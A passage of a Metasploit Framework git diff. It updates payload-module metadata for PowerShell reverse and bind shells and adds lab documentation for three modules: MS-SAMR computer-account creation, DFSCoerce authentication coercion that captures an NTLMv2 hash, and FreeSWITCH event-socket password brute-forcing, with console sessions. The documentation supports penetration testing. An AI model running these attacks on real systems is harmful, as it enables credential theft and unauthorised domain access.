     "ref_name": "cmd/windows/powershell/x64/loadlibrary",
@@ -178177,7 +178338,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/messagebox",
@@ -178215,7 +178376,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp",
@@ -178253,7 +178414,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -178292,7 +178453,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe",
@@ -178330,7 +178491,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp",
@@ -178372,7 +178533,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4",
@@ -178410,7 +178571,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid",
@@ -178448,7 +178609,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http",
@@ -178489,7 +178650,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https",
@@ -178527,7 +178688,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe",
@@ -178565,7 +178726,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp",
@@ -178607,7 +178768,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4",
@@ -178645,7 +178806,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid",
@@ -178683,7 +178844,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp",
@@ -178721,7 +178882,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps",
@@ -178757,7 +178918,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp",
@@ -178794,7 +178955,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid",
@@ -178830,7 +178991,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe",
@@ -178866,7 +179027,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp",
@@ -178907,7 +179068,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4",
@@ -178944,7 +179105,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid",
@@ -178980,7 +179141,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe",
@@ -179016,7 +179177,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp",
@@ -179057,7 +179218,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4",
@@ -179094,7 +179255,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid",
@@ -179129,7 +179290,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp",
@@ -179166,7 +179327,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp",
@@ -179203,7 +179364,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp",
@@ -179240,7 +179401,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl",
@@ -179275,7 +179436,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp",
@@ -179311,7 +179472,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid",
@@ -179347,7 +179508,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe",
@@ -179382,7 +179543,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp",
@@ -179422,7 +179583,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4",
@@ -179458,7 +179619,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid",
@@ -179493,7 +179654,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp",
@@ -179533,7 +179694,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4",
@@ -179569,7 +179730,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid",
@@ -179604,7 +179765,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp",
@@ -179639,7 +179800,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp",
@@ -179675,7 +179836,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp",
@@ -179712,7 +179873,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid",
@@ -179749,7 +179910,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe",
@@ -179785,7 +179946,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp",
@@ -179826,7 +179987,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4",
@@ -179863,7 +180024,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid",
@@ -179900,7 +180061,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http",
@@ -179939,7 +180100,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https",
@@ -179975,7 +180136,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp",
@@ -180016,7 +180177,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4",
@@ -180053,7 +180214,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid",
@@ -180090,7 +180251,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp",
@@ -180127,7 +180288,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps",
@@ -204195,7 +204356,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-01-14 16:55:43 +0000",
+    "mod_time": "2022-06-23 18:43:18 +0000",
     "path": "/modules/post/windows/escalate/getsystem.rb",
     "is_install_path": true,
     "ref_name": "windows/escalate/getsystem",
@@ -204203,6 +204364,14 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "Named Pipe Impersonation",
+        "Token Duplication",
+        "RPCSS",
+        "PrintSpooler",
+        "EFSRPC",
+        "EfsPotato"
+      ]
     },
     "session_types": [
       "meterpreter"

documentation/modules/auxiliary/admin/dcerpc/samr_computer.md

@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```

documentation/modules/auxiliary/scanner/dcerpc/dfscoerce.md

@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
+4. Set the `RHOSTS` and `LISTENER` options
+5. Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### METHOD
+The RPC method to use for triggering.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce 
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
+
+[*] 192.168.159.96:445    - Connecting to Distributed File System (DFS) Namespace Management Protocol
+[*] 192.168.159.96:445    - Binding to \netdfs...
+[+] 192.168.159.96:445    - Bound to \netdfs
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/dfscoerce) >
+```

documentation/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.md

@@ -0,0 +1,65 @@
+## Vulnerable Application
+[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
+WebRTC, telecommunications, video, and Voice over Internet Protocol.
+
+The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
+control FreeSWITCH and is enabled by default.
+
+This module has been tested successfully on FreeSWITCH versions:
+* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
+
+### Description
+
+This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
+Note that this service does not require a username to log in; login is done purely via supplying a valid password.
+This module will stops as soon as a valid password is found.
+
+This service is enabled by default and listens on TCP port 8021 on the local network interface.
+
+Source and Installers:
+* [Source Code Repository](https://github.com/signalwire/freeswitch)
+* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
+* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
+* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
+
+Docker installation:
+```
+docker pull drachtio/drachtio-freeswitch-mrf
+docker run -d --rm --name FS1 --net=host \
+-v /home/deploy/log:/usr/local/freeswitch/log  \
+-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
+-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
+drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
+```
+
+## Verification Steps
+1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
+2. Do: `set RHOSTS [ips]`
+3. Do: `set PASS_FILE /home/kali/passwords.txt`
+4. Do: `run`
+
+## Options
+### PASS_FILE
+The file containing a list of passwords to try logging in with.
+
+## Scenarios
+### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
+```
+msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
+RHOSTS => 192.168.56.1
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
+PASS_FILE => /home/kali/passwords.txt
+msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
+
+[!] 192.168.56.1:8021        - No active DB -- Credential data will not be saved!
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
+[-] 192.168.56.1:8021        - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
